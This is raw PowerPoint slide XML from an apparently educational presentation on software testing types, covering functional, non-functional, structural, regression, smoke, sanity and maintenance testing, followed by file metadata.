            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3752220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224136" y="3635732"/>
            <a:ext cx="5652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structure or architecture of the software or system </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="4195301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224136" y="4078813"/>
            <a:ext cx="62281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Change related, i.e. confirming that defects have been fixed (confirmation testing) and looking for unintended changes (regression testing)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60775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72842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of Function (Functional Testing)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1437" y="1712098"/>
            <a:ext cx="7416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functions are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>“what”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>does.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functional testing types are based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on examination of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>external (front-end) system behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>(black box testing)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958767" y="2924944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224136" y="2780928"/>
            <a:ext cx="6588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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nteroperability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3403213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224136" y="3286725"/>
            <a:ext cx="5652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Functional testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3896236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224136" y="3779748"/>
            <a:ext cx="5652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Security testing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60775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443576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Non-functional Testing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1437" y="1712098"/>
            <a:ext cx="7416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non-function characteristics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>“how”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the system does. Non-functional testing may be performed at all test levels.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958767" y="2636912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224136" y="2492896"/>
            <a:ext cx="6588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Load testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="2969424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224136" y="2852936"/>
            <a:ext cx="5652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Performance testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3329464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224136" y="3212976"/>
            <a:ext cx="5652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Stress testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3689504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224136" y="3573016"/>
            <a:ext cx="5652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Usability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="4049544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224136" y="3933056"/>
            <a:ext cx="5652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Maintainability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="4409584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224136" y="4293096"/>
            <a:ext cx="5652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Portability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="4769624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224136" y="4653136"/>
            <a:ext cx="5652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Reliability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="5120372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224136" y="5003884"/>
            <a:ext cx="5652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Volume testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="5480412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224136" y="5363924"/>
            <a:ext cx="5652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Installation testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="5840452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224136" y="5723964"/>
            <a:ext cx="5652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Configuration testing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60775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33493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Structural Testing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1437" y="1712098"/>
            <a:ext cx="7416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Structural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>(white-box)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> testing may be performed at all test levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>based on examination of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>internal (back-end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>behavior.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958767" y="2636912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224136" y="2492896"/>
            <a:ext cx="6588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Statement testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="2969424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224136" y="2852936"/>
            <a:ext cx="5652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Decision testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3329464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224136" y="3212976"/>
            <a:ext cx="5652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Condition testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3689504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224136" y="3573016"/>
            <a:ext cx="5652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Multiple condition testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="4078813"/>
            <a:ext cx="7416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All these testing techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>help measure the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code coverage: statement coverage, decision coverage, condition coverage etc. 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xmlns="" val="4060775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50520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Related to Changes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1437" y="1712098"/>
            <a:ext cx="74169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Regression testing may be performed at all test levels, and includes functional, non-functional and structural testing. Regression test suites are run many times and generally evolve slowly, so regression testing is a strong candidate for automation. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3185448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224136" y="3068960"/>
            <a:ext cx="5652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Smoke testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="3617496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224136" y="3501008"/>
            <a:ext cx="5652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Sanity testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="4049544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224136" y="3933056"/>
            <a:ext cx="5652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Bug regression, old bug regression and side effect testing as parts of regression testing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60775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395710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Maintenance Testing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1437" y="1712098"/>
            <a:ext cx="74169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Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>deployed, a software system is often in service for years or decades. During this time the system, its configuration data, or its environment are often corrected, changed or extended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So, the maintenance testing is necessary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the changes to an operational system or the impact of a changed environment to an operational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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0775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15194</TotalTime>
  <Words>1600</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>183</Paragraphs>
  <Slides>10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Olexandr Vedmid'</dc:creator>
  <cp:lastModifiedBy>smar</cp:lastModifiedBy>
  <cp:revision>519</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-11T15:33:26Z</dcterms:modified>
</cp:coreProperties>
</file>